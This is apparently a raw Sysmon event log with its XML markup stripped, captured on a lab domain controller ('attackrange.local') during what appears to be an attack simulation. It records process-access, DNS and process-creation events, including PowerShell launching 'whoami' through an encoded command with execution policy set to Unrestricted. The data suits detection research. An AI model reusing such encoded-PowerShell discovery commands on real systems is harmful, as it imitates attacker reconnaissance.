10341000x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.907{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.907{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:39.829{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x0000037a) 22542200x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.407{59A5CD1D-8E56-6005-2E00-00000000A301}24643.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.407{59A5CD1D-8E56-6005-2E00-00000000A301}24642.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.9003-C:\Windows\sysmon64.exe 22542200x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.114{59A5CD1D-8E6E-6005-7F00-00000000A301}4292localhost0127.0.0.1;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.854{59A5CD1D-8E46-6005-1600-00000000A301}1544isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.818{59A5CD1D-8E46-6005-1600-00000000A301}1544win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.817{59A5CD1D-8E46-6005-1400-00000000A301}1304eu-central-1.compute.internal1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.817{59A5CD1D-8E46-6005-1400-00000000A301}1304fcfikdgfbjwi1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.805{59A5CD1D-8E46-6005-1100-00000000A301}1172wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.756{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine0fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.755{59A5CD1D-8E56-6005-2800-00000000A301}2696WIN-DC-4950fe80::cf6:2edc:f5ff:fef1;2001:0:2851:782c:cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.698{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-495.attackrange.local0fe80::cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.693{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine0fe80::cf6:2edc:f5ff:fef1;fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.626{59A5CD1D-8E46-6005-1600-00000000A301}1544localhost0::1;::ffff:127.0.0.1;C:\Windows\System32\svchost.exe 22542200x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.608{59A5CD1D-8E46-6005-1600-00000000A301}1544win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:38.606{59A5CD1D-8E44-6005-0B00-00000000A301}856_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.751{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.735{59A5CD1D-8E6F-6005-8500-00000000A301}47844880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7e1a32a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d643e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7e0f5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d604997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d662e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d6464cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d6464cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d64635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d6382e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d644130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d643e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7e0f5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d62ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+7d62a232(wow64) 154100x80000000000000002871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.733{59A5CD1D-8E6F-6005-8600-00000000A301}4884C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.673{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.673{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.626{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rtjt3zuv.0er.ps12021-01-18 13:34:39.626 10341000x80000000000000002867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.610{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.610{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32